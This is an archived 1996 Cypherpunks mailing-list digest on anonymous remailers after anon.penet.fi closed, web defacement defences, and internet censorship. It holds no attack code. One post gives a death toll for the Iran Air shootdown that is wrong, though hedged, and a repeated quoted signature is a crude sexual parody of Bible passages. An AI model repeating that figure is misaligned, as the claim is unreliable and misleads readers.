In-Reply-To: <Pine.UW2.3.93.960831232038.22836C-100000@wilma>
Message-ID: <199609011605.MAA26536@gradin.cis.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In message <Pine.UW2.3.93.960831232038.22836C-100000@wilma>, Alan Horowitz writ
es:
>
>The problem is, from my experience at Roosevelt Roads, the Navy never
>conducts live fire exercises without declaring the area of operation
>strictly off limits to non-military aircraft.  Also, the 747 would have
>shown up WITH ITS TRANSPONDER DATA on the screens on an Aegis ship, so why
>would they fire?  And, I didn't think that a P3 pilot would fly around in

This has happened before; an Aegis ship in the Persian Gulf shot down
an Iranian Airlines (or whatever it's called) aircraft; i'm not sure
how many died in that incident (i think about 70 - can very well be
wrong). The US just "apologized" for the mistake AFAIK.
- -Angelos

PS. This happened 8-10 years ago if i recall well.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMim0Lr0pBjh2h1kFAQF8AwP8CHSR3sz4tWUbulIWyYgpULLJHtFD3Wag
KQx7t+nWyt78TWvZzsFwgGhD295+Ki3PTUGPlWHqO1p0SftReHXuNqOqYXY6EI1p
S7eSrrML2YbUTlJ7GLgPCwYEwaeHuyFUNRHoIwmFBLjDnlJZRhKYhhomw5k7EKvl
mwU6daPDCiY=
=u9kk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 03:12:07 +0800
To: wb8foz@nrk.com
Subject: Re: Moscowchannel.com hack
In-Reply-To: <199609011723.NAA00697@nrk.com>
Message-ID: <199609011722.MAA31289@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


David Lesher wrote:
> 
> Igor Chudov @ home sez:
> > 
> > > Write your web site to a CD-ROM and hard-code the base directory into the
> > > webserver.
> > 
> > A hacker who has root can forcibly unmount the cdrom and mount another
> > directory on that node. Not a good solution.
> 
> Real hard disks such as RL02's & RK07's have WRITE DISABLE
> switches....
> 

You can't mount the whole Unix read-only, so there will always be a place
to put the hacked web page, and then mount that place over DocumentRoot.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 03:22:56 +0800
To: cypherpunks@toad.com
Subject: It is good that anon.penet.fi has been closed!
Message-ID: <199609011733.MAA31382@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Yes, subject says it all. anon.penet.fi was a whole lot worse than
cypherpunks remailers. It provided clueless users with no real security,
because it stored return addresses and did not use chaining and
encryption.

Maybe closing of anon.penet.fi will spur real interest from the unwashed
alt.sex.* masses to the truly secure remailers.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 05:31:07 +0800
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk>
Message-ID: <199609011943.MAA08988@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! I wish to gauge the response on something here:
! 
! Following the closure of the anon.penet.fi remailer:
! 
! If I can get enough funding to cover all expenses (I am a student and 
! cannot unfortunately contribute much myself) I will install lines and 
! hardware at my premises and run the equivalent to the anon.penet.fi 
! remailer.
! 
! I don`t know what the response to this will be, I need approximately 
! 5000 UK pounds to set up such an operation (Yes, a leased line really 
! does cost that much in the UK) and then a monthly income of around 
! 3000 UK pounds.

No way, dude.  You can run even an unrestricted T1 here for quite a bit
less than œ3000.  All you need though, is a flat rate dedicated 28,800 
modem connection, which has a monthly fee of about œ50-100, but we're a
little spoiled in the Bay Area.  Whatever the fees are there, you could
put up something pretty cool as a free server, and perhaps also figure
out a way to sell the excess bandwidth at a profit.

Whatever you do, stick to one of the unices like linux.  Our brief 
experiences with trying to make Windows 3.0 and Win95 useful convinced us
that nothing good can come from Micro$oft.

We're planning on starting a modem server as soon as we can get our hardware
BS problems sorted out.  We'll try installing the cypher punk goodies like
Mixmaster.  We're planning on a 100% open server that can be telnet 'ed 
into so we can be open to suggestions to improve security and solicit 
advice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crichardson@earthlink.net (Conner Richardson)
Date: Mon, 2 Sep 1996 05:23:55 +0800
To: patrickbc@juno.com
Subject: Re: hackers texts
Message-ID: <v02140b00ae4f52f12501@[153.37.144.4]>
MIME-Version: 1.0
Content-Type: text/plain



I working on a WWW page for people who want to recieve text articles on
hacking/phreaking/etc. It's not very extensive now, but were working on it.
Point your browswer to:
http://home.earthlink.net/~crichardson/omega.html

Also on this page are some files, as well as some other misc indexes. All
feedback is apprechiated.

-flux






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herbert Feran <porsche@themall.net>
Date: Mon, 2 Sep 1996 05:43:44 +0800
To: cypherpunks@toad.com
Subject: FW: get me off of this list!!!!!
Message-ID: <Chameleon.960901124836.herb@River4.themall.net>
MIME-Version: 1.0
Content-Type: text/plain



--- On Sun, 1 Sep 96 12:41:21 PDT  Herbert Feran 
<porsche@themall.net> wrote:
I need to be taken off of this list but I can't remeber the code 

to desubscribe.  Can anyone tell me what the code is?
-------------------------------------
Name: Herbert Feran
E-mail: Herbert Feran <h7869755@themall.net>
Date: 9/1/96
Time: 12:41:21 PM

This message was sent by Chameleon 
-------------------------------------


-----------------End of Original Message-----------------

-------------------------------------
Name: Herbert Feran
E-mail: Herbert Feran <h7869755@themall.net>
Date: 9/1/96
Time: 12:48:19 PM

This message was sent by Chameleon 
-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 2 Sep 1996 02:50:24 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <ae4dc381000210043ce5@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960901125749.19484A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Timothy C. May wrote:

> To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> and his feeble son, they can't. Except by pulling the plugs on forums in
> which my posts are carried. I consider this a Good Thing (that politicians
> in Country A generally have no power to tell citizen-units in Country B
> what they can say and what they can't).


Unless they adopt "Assassination Protection [of the "ignorant" masses]!!

And they won't use remailers ...

EBD

> 
> --Tim May
> 
> 
> --
> [This Bible excerpt awaiting review under the U.S. Communications Decency
> Act of 1996]
> And then Lot said, "I have some mighty fine young virgin daughters. Why
> don't you boys just come on in and fuck them right here in my house - I'll
> just watch!"....Later, up in the mountains, the younger daughter said:
> "Dad's getting old. I say we should fuck him before he's too old to fuck."
> So the two daughters got him drunk and screwed him all that night. Sure
> enough, Dad got them pregnant, and had an incestuous bastard son....Onan
> really hated the idea of doing his brother's wife and getting her pregnant
> while his brother got all the credit, so he pulled out before he
> came....Remember, it's not a good idea to have sex with your sister, your
> brother, your parents, your pet dog, or the farm animals, unless of course
> God tells you to. [excerpts from the Old Testament, Modern Vernacular
> Translation, TCM, 1996]
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 06:02:23 +0800
Subject: Re: Bob Dole is on Drugs
In-Reply-To: <199609011633.LAA30982@manifold.algebra.com>
Message-ID: <199609012004.NAA11397@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! http://allpolitics.com/news/9608/31/radio.addresses/
! 
! ... snip ...
! 
!    Dole, who returned to Washington for Labor Day
!    weekend, also pledged to use the White House as a
!    bully pulpit to promote the "moral message"
!    against drugs and to criticize what he called the
!    entertainment industry's glamorization of drug use.
! 
!    On Sunday, he is to address the convention of the
!    National Guard Association of the United States
!    during which he's expected to propose that the
!    military be enlisted to assist in a renewed war on
!    drugs. 

So why didn't you support Pat Buchanan for president, the ONLY 
candidate to support even a partial legalization of marijuana?  Speaking
of legalizing drugs, wouldn't it be a good tactic to demand the absolute
legalization of ALL drugs?  The compromise eventually to follow would be 
a vast improvement over the status quo.

I'm voting Libertarian, and thinking of registering as such, even though
I can't stand their capitalist economics, they stand by allowing people
to organize and speak out against the very ideals that allowed them to
do such.  Our government is so corrupt, swinging a figurative axe against
it could very well lead to improvement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Mon, 2 Sep 1996 03:16:50 +0800
To: ichudov@algebra.com
Subject: Re: Moscowchannel.com hack
In-Reply-To: <199609011509.KAA26254@manifold.algebra.com>
Message-ID: <199609011723.NAA00697@nrk.com>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home sez:
> 
> > Write your web site to a CD-ROM and hard-code the base directory into the
> > webserver.
> 
> A hacker who has root can forcibly unmount the cdrom and mount another
> directory on that node. Not a good solution.

Real hard disks such as RL02's & RK07's have WRITE DISABLE
switches....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 2 Sep 1996 03:43:47 +0800
To: Dave Farber <farber@central.cis.upenn.edu>
Subject: Re: Esther Dyson on Remailers
Message-ID: <2.2.32.19960901173906.00730cd8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 AM 9/1/96 -0400, Dave Farber wrote:
>EFF does not, to my knowledge, (and I am a Board Member) have an
>organizational view on this issue. There are a lot of different views and
>each member of EFF has their own view that they can and will state as
>private people. The tendency of the Press to label people with organizations
>affiliation ship gives the impression of organizational views. For example I
>certainly don't speak for the University of Pennsylvania when I say thing to
>the newspapers.
>
>Dave
>


At CFP in '95 in SF, Esther expressed the view that there was a place on the
Net for an anonymous ghetto (my words not hers) where people could be
anonymous but that most of the net would involve traceability of
transactions so that people could be held accountable and that businesses
and individuals would want to know who they were dealing with for payment
and accountability reasons.

I am not stating her position well I'm sure but it was clear that she
thought that non-anonymity would be the rule not because it was mandated but
just because Net actors would want it that way.  A short quote would not
allow anyone to understand her full position.

If she believes that anonymity would be rejected voluntarily for practical
reasons then that is just a prediction of a market not a conclusion.  Most
on this list would have no objection to making a prediction though we might
disagree with it.

Just as Esther predicted that the net would end copyright, we might predict
that the net combined with immediate settlement payment systems might reduce
if not eliminate the need for "positive ID."  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 06:52:29 +0800
To: qut@nutcom.com (Dave Harman OBC)
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <199609011922.OAA31806@manifold.algebra.com>
Message-ID: <199609012058.NAA16695@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote:
! >  Sun, 1 Sep 1996 paul@fatmans.demon.co.uk wrote:
! > 
! > > I don`t know what the response to this will be, I need approximately
! > > 5000 UK pounds to set up such an operation (Yes, a leased line really
! > > does cost that much in the UK) and then a monthly income of around
! > > 3000 UK pounds.
! > 
! > I remember the load on anon.penet.fi was something like 7500 messages
! > daily. As for connection, you will need 64kbps line or even less in case
! > you compress the messages. The machine could be either an older Sun Sparc
! > or a PC running free Unix (Linux/FreeBSD/...)
! 
! A couple of notes: 7500 messages/day is not the accurate measure of
! the load of anon.penet.fi. Remember that each messages had to 
! 
! 	1) come in
! 	2) be processed
! 	3) be sent out
! 	4) trigger a confirmation sent to the submitter

There's plenty of room for a hacker to improve the Kleinpaste derived server,
such as eliminating confirmations unless there's an error.  Queing 
should help a great deal.

! It is not the same as a user simply receiving 7500 messages/day.
! 
! If we suppose that each message creates 10KB of IP traffic, it gives us
! 75MB/day. 75mb/day is less than 1KB per second. It can be handled by a
! simple 28.8KBPS PPP connection which will still half the capacity to grow
! twice. A second dedicated phone line and a second modem can be added
! later. 
! 
! I suspect that UUCP as opposed to IP connection will work better,
! because UUCP gives us a unidirectional flow of data, which is much more
! efficient than modems switching direction of the transport for almost
! each IP packet.

The server can que the mail for a hour or so before sending it out all
at once.

! I suggest the following configuration: a IBM 486 PC with 16MB of
! RAM and 28.8 modem, running qmail instead of sendmail and Linux,

How is qmail better than sendmail?  The default BSD sendmail since 8.00+
has automated ident requests built in.  It can easily be compiled without
that default option, for greater efficiency.

! on a dedicated 28.8 PPP line. The cheapest used VGA display from 
! the nearby waste dump will work just fine. 

Hell, any monitor should work!  I'm curious about how to go about 
acquiring one of those huge 100+ x 100+ charactor terminals that linux 
supports.  Is it practical, cheap and readable?

! Estimated cost: $700-1000 for the system, $50-100/month for the
! connection, and 3 hours per day to deal with mailbombing from

ln -s /dev/null /usr/postmaster
ln -s /dev/null /usr/abuse

That should filter the mail quite nicely!  :->

BTW, do y'all have a favourite Bay Area store for used or otherwise 
affordable unice fond equiption?  Such as used Sparcs or Alphas?  Legal
copies of commercial unice software along with the equipment?  Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Mon, 2 Sep 1996 06:52:18 +0800
To: cypherpunks@toad.com
Subject: Re: FW: get me off of this list!!!!!
Message-ID: <199609012102.OAA01685@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain



>--- On Sun, 1 Sep 96 12:41:21 PDT  Herbert Feran 
><porsche@themall.net> wrote:
>I need to be taken off of this list but I can't remeber the code 
>
>to desubscribe.  Can anyone tell me what the code is?
>-------------------------------------

What's the frequency Herbert?

Help, I've fallen and I can't remeber the code.

Hint: Try consulting "The Codebreakers."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 2 Sep 1996 04:19:20 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Moscowchannel.com hack
In-Reply-To: <199609011509.KAA26254@manifold.algebra.com>
Message-ID: <Pine.LNX.3.95.960901141631.186B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 1 Sep 1996, Igor Chudov @ home wrote:

> snow wrote:
> > 
> > On Sat, 31 Aug 1996, Joel McNamara wrote:
> > 
> > > Not really crypto, but related to the DOJ hack in a way.
> > > 
> > > Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> > > site was hacked and altered by someone who didn't seem to like Russians all
> > > Just a matter of time before some builds a dedicated Satan type tool that
> > > scans for  HTTP server holes or messed up file permissions to make locating
> > > potential victims easy.
> > Write your web site to a CD-ROM and hard-code the base directory into the
> > webserver.
> 
> A hacker who has root can forcibly unmount the cdrom and mount another
> directory on that node. Not a good solution.

As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM
device can be remounted.  Besides, if someone manages to get root access on any
machine, the sysadmin of that machine is basically screwed anyway.  It's much
better than having to back up the web page on a tape and having to restore the
data when it is altered.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMinT7yzIPc7jvyFpAQHe7AgAuRNtTXZeLkuXo0CFoJOgrI+EEfHOKUsI
9KoRm+aesqNOvFpxPcHiE2QypMDjgjFqGozsT+Qb48W82Yt0p10PdqGtq1Ais+M0
b8gwLbnUPY8tnRFL49TqZIvAHl2kyo/7pxViTrXfNtBe+rSA+9FZHPBJgtHzWy2X
LIOQ9P6NPMmdlKuaeZQ3oF1esbvlHInsYOgGTJN0DZQR8ivFyXZ3MA0XjXvnF2pl
4lUDfgUN+BAQzhW56o0cgBnGYetujNJYVAQkzUwCIs2sfxS1Sex305vqfmFHUVkY
HACMhuoVXYZXuF+5NCjfhHsnjEiYgeMczGTZDlwOCbIFTxCc8/t6tQ==
=oxki
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 05:18:17 +0800
To: jk@stallion.ee (Jüri Kaljundi)
Subject: Re: anon.penet.fi: URGENT REQUEST
In-Reply-To: <Pine.GSO.3.93.960901195715.2418A-100000@nebula>
Message-ID: <199609011922.OAA31806@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


=?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote:
>  Sun, 1 Sep 1996 paul@fatmans.demon.co.uk wrote:
> 
> > I don`t know what the response to this will be, I need approximately=20
> > 5000 UK pounds to set up such an operation (Yes, a leased line really=20
> > does cost that much in the UK) and then a monthly income of around=20
> > 3000 UK pounds.
> 
> I remember the load on anon.penet.fi was something like 7500 messages
> daily. As for connection, you will need 64kbps line or even less in case
> you compress the messages. The machine could be either an older Sun Sparc
> or a PC running free Unix (Linux/FreeBSD/...)

A couple of notes: 7500 messages/day is not the accurate measure of
the load of anon.penet.fi. Remember that each messages had to 

	1) come in
	2) be processed
	3) be sent out
	4) trigger a confirmation sent to the submitter

It is not the same as a user simply receiving 7500 messages/day.

If we suppose that each message creates 10KB of IP traffic, it gives us
75MB/day. 75mb/day is less than 1KB per second. It can be handled by a
simple 28.8KBPS PPP connection which will still half the capacity to grow
twice. A second dedicated phone line and a second modem can be added
later. 

I suspect that UUCP as opposed to IP connection will work better,
because UUCP gives us a unidirectional flow of data, which is much more
efficient than modems switching direction of the transport for almost
each IP packet.

I suggest the following configuration: a IBM 486 PC with 16MB of
RAM and 28.8 modem, running qmail instead of sendmail and Linux,
on a dedicated 28.8 PPP line. The cheapest used VGA display from 
the nearby waste dump will work just fine. 

Estimated cost: $700-1000 for the system, $50-100/month for the
connection, and 3 hours per day to deal with mailbombing from
disgruntled usenet kooks like the right reverend colin james iii
(puke).

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 2 Sep 1996 04:33:00 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.BSF.3.91.960901125749.19484A-100000@mercury.thepoint.net>
Message-ID: <Pine.SOL.3.91.960901143741.9912A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Isn't that mostly an American thing?

bd

On Sun, 1 Sep 1996, Brian Davis wrote:

> On Sat, 31 Aug 1996, Timothy C. May wrote:
> 
> > To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> > and his feeble son, they can't. Except by pulling the plugs on forums in
> > which my posts are carried. I consider this a Good Thing (that politicians
> > in Country A generally have no power to tell citizen-units in Country B
> > what they can say and what they can't).
> 
> 
> Unless they adopt "Assassination Protection [of the "ignorant" masses]!!
> 
> And they won't use remailers ...
> 
> EBD
> 
> > 
> > --Tim May
> > 
> > 
> > --
> > [This Bible excerpt awaiting review under the U.S. Communications Decency
> > Act of 1996]
> > And then Lot said, "I have some mighty fine young virgin daughters. Why
> > don't you boys just come on in and fuck them right here in my house - I'll
> > just watch!"....Later, up in the mountains, the younger daughter said:
> > "Dad's getting old. I say we should fuck him before he's too old to fuck."
> > So the two daughters got him drunk and screwed him all that night. Sure
> > enough, Dad got them pregnant, and had an incestuous bastard son....Onan
> > really hated the idea of doing his brother's wife and getting her pregnant
> > while his brother got all the credit, so he pulled out before he
> > came....Remember, it's not a good idea to have sex with your sister, your
> > brother, your parents, your pet dog, or the farm animals, unless of course
> > God tells you to. [excerpts from the Old Testament, Modern Vernacular
> > Translation, TCM, 1996]
> > 
> > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 2 Sep 1996 04:25:32 +0800
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <Pine.SOL.3.91.960901143741.9912A-100000@use.usit.net>
Message-ID: <Pine.BSF.3.91.960901144018.25883A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


> Brad Dolan wrote:
> Isn't that mostly an American thing?
> 
> bd

But we've taught them so much ....

bd2 




> On Sun, 1 Sep 1996, Brian Davis wrote:
> 
> > On Sat, 31 Aug 1996, Timothy C. May wrote:
> > 
> > > To be blunt, if Singapore wants to stop me from discussing the dictator Yew
> > > and his feeble son, they can't. Except by pulling the plugs on forums in
> > > which my posts are carried. I consider this a Good Thing (that politicians
> > > in Country A generally have no power to tell citizen-units in Country B
> > > what they can say and what they can't).
> > 
> > 
> > Unless they adopt "Assassination Protection [of the "ignorant" masses]!!
> > 
> > And they won't use remailers ...
> > 
> > EBD
> > 
> > > 
> > > --Tim May
> > > 
> > > 
> > > --
> > > [This Bible excerpt awaiting review under the U.S. Communications Decency
> > > Act of 1996]
> > > And then Lot said, "I have some mighty fine young virgin daughters. Why
> > > don't you boys just come on in and fuck them right here in my house - I'll
> > > just watch!"....Later, up in the mountains, the younger daughter said:
> > > "Dad's getting old. I say we should fuck him before he's too old to fuck."
> > > So the two daughters got him drunk and screwed him all that night. Sure
> > > enough, Dad got them pregnant, and had an incestuous bastard son....Onan
> > > really hated the idea of doing his brother's wife and getting her pregnant
> > > while his brother got all the credit, so he pulled out before he
> > > came....Remember, it's not a good idea to have sex with your sister, your
> > > brother, your parents, your pet dog, or the farm animals, unless of course
> > > God tells you to. [excerpts from the Old Testament, Modern Vernacular
> > > Translation, TCM, 1996]
> > > 
> > > 
> > > 
> > 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Mon, 2 Sep 1996 07:42:13 +0800
Subject: Re: It is good that anon.penet.fi has been closed!
In-Reply-To: <199609011733.MAA31382@manifold.algebra.com>
Message-ID: <199609012143.OAA20934@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Yes, subject says it all. anon.penet.fi was a whole lot worse than
! cypherpunks remailers. It provided clueless users with no real security,
! because it stored return addresses and did not use chaining and
! encryption.
! 
! Maybe closing of anon.penet.fi will spur real interest from the unwashed
! alt.sex.* masses to the truly secure remailers.

There has to be more crypto anonymizing aliasing remailers and with easier
interfaces.  Closing the Kleinpaste derived server will help put the 
pressure of demand to start better remailer systems.  There's not enough
capacity and reliability with the servers extant.  There should be 
thousands of full featured remailers.

We'll help out as soon as we can get the hardware problems we have figured
out and provided there's understandably configurable linux networking 
software out there. 

Would it be a good idea to have a 100% open server that anyone can 
telnet in and copy all the e-mail data?  If the chaining crypto 
remailers are reliable, there's no reason why not, except the risk of
clock cycle cryptanalysis.  There should be an easy way of preventing
those attacks, if not, the data can be read accessable only after the
{de|en}cryption.  This openness should go a long way in protection
so far as liability is concerned.

In other words, if Big Brother can force his way into your privacy,
why not little brother?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Senescall <apache@quux.apana.org.au>
Date: Sun, 1 Sep 1996 14:28:12 +0800
To: cypherpunks@toad.com
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.3.89.9608311202.A7161-0100000@well.com>
Message-ID: <Pine.LNX.3.91.960901145443.1716A-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, Declan McCullagh wrote:

> The attached article was reposted to fight-censorship with the permission
> of the Los Angeles Times, which ran it on the front page today. 
[snip]
> Note Esther Dyson's comments:
> 
>          "The damage that can be done by anonymity is far bigger" than in
>    any other medium, said Esther Dyson, chairwoman of the Electronic
>    Frontier Foundation. "In the end, you need to be able to get at
>    somebody's identity to enforce accountability, and the question is how
>    do you also enforce freedom of speech and freedom from prosecution for
>    unpopular opinions."

Is this _really_ the EFF policy on anonymopus remailers??

I will check with our local version of the EFF and see what they have to say.

If the EFF is not for anonymity it needs to be publicised. Perhaps the 
EFF has been in bed with the political pigs too long. *OINK*

-- 
   .////.   .//    Charles Senescall            apache@quux.apana.org.au
 o:::::::::///     Fuck TEL$TRA                    
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    <A HREF="http://quux.apana.org.au/~apache/"> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Mon, 2 Sep 1996 01:23:30 +0800
To: cypherpunks@toad.com
Subject: anon.penet.fi: URGENT REQUEST
Message-ID: <841590548.16439.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


FAO: ALL CYPHERPUNKS & COMMUNITY LIST READERS

I wish to gauge the response on something here:

Following the closure of the anon.penet.fi remailer:

If I can get enough funding to cover all expenses (I am a student and 
cannot unfortunately contribute much myself) I will install lines and 
hardware at my premises and run the equivalent to the anon.penet.fi 
remailer.

I don`t know what the response to this will be, I need approximately 
5000 UK pounds to set up such an operation (Yes, a leased line really 
does cost that much in the UK) and then a monthly income of around 
3000 UK pounds.

The service, I propose, would be free to the users, and maintained my 
by voluntary donation, no access restriction would be placed on 
non-paying users.

Please send me mail at paul@fatmans.demon.co.uk with the subject as 
ANON.PENET.FI SERVER and the message body an ammount in UK pounds or 
dollars (approximate ammounts are OK) so I can guage the response.
         NO MONEY WILL BE TAKEN AT THE PRESENT TIME.

As I said, I just want to see what teh response is like and to see if 
it would be possible, I also would be unable to set it up until I had 
some solid commintment from the people giving the money, I expect a 
large response to this and a measly one to the real appeal for hard 
cash if it goes ahead!  -  anyway, mail me and i`ll report the 
response back soon...



  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.org (Rishab Aiyer Ghosh)
Date: Mon, 2 Sep 1996 08:07:20 +0800
To: amehta@giasdl01.vsnl.net.in (Arun Mehta)
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <1.5.4.32.19960831063502.0033b25c@giasdl01.vsnl.net.in>
Message-ID: <199609012218.PAA13546@nic.cerf.net>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:
> and India will be too: the law here holds the ISPs responsible
> for ensuring that nothing objectionable and obscene is carried by
> them, and what simpler way to comply than to

FWIW: "There is no need to licence content providers; Internet
service providers are not responsible for illegal content." R K
Takkar, Indian Telecom Secretary (at the time of interview); see
http://dxm.org/techonomist/news/ndp1.html for more.

> Ideally, I should be able to 
> send via pgp and anonymous remailer a request for a page, which would soon
> come beamed down unencrypted via satellite. No more waiting hours
> for the latest version of Netscape to download

(!) you'll only have to wait hours for your anonymous-remailer-web-to-e-mail
gateway, EVERY time you want a page. 

In one of my Electric Dreams columns, "Censorship is bad for business,"
(archived here and there on the Web) I wrote that governments will 
eventually see sense and stop censorship, if they're interested in
making their countries rich. Singapore in every other field of work
has shown its interest in deregulation; I would expect them to do so
on the Net as well, when it becomes clear that there's rather more to
it than porn and subversion. In the meanwhile, there's not much point 
trying to "help" them, apart from providing moral support. Incidentally,
do the cypherpunk archives in Singapore, which always come out first
in my AltaVista searches, not contain a trace of officially disliked
content?

In this month's First Monday, due out tomorrow, Andreas Harsono -
a banned Indonesian journalist who reports from Jakarta through the
Internet for various foreign publications - writes on censorship
in S-E Asia, and how some countries, like Indonesia, are _more_
relaxed in their treatment of on-line media than the press.

Best,
Rishab
ps. I don't read the list regularly, so reply by mail if you want
a response.

First Monday - The Peer-Reviewed Journal on the Internet
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen

International Editor - Rishab Aiyer Ghosh (rishab@dxm.org)
Pager +91 11 9622 162187; Fax +91 11 2209608 or 2426453 or 2224058
A4/204 Ekta Vihar, 9 Indraprastha Extn, New Delhi 110092 INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 3 Sep 1996 04:03:46 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk>
Message-ID: <199609011430.PAA00133@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Allan <peter.allan@aeat.co.uk> writes on cpunks:
> [re-encrypting as a mechanism to prevent an attacker in a spamming
> attack reconizing his own messages]

The attack Peter is hoping to frustrate is as follows: target message
being sent from Alice to Bob through remailer R.  The attacker in an
active `spam' attack floods remailer R so that he will recognize the
target message and it's destination.

Another approach to making the transmitted message unrecognizable to
it's owner would be to finish the implementation of D-H key exchange
in mixmaster.  (The version I am looking at (2.0.3) does not have the
D-H key exchange and direct socket communication implemented, rather
it delivers mail by sendmail, I believe).

As a bonus this provides forward secrecy, so that not even a supeonaed
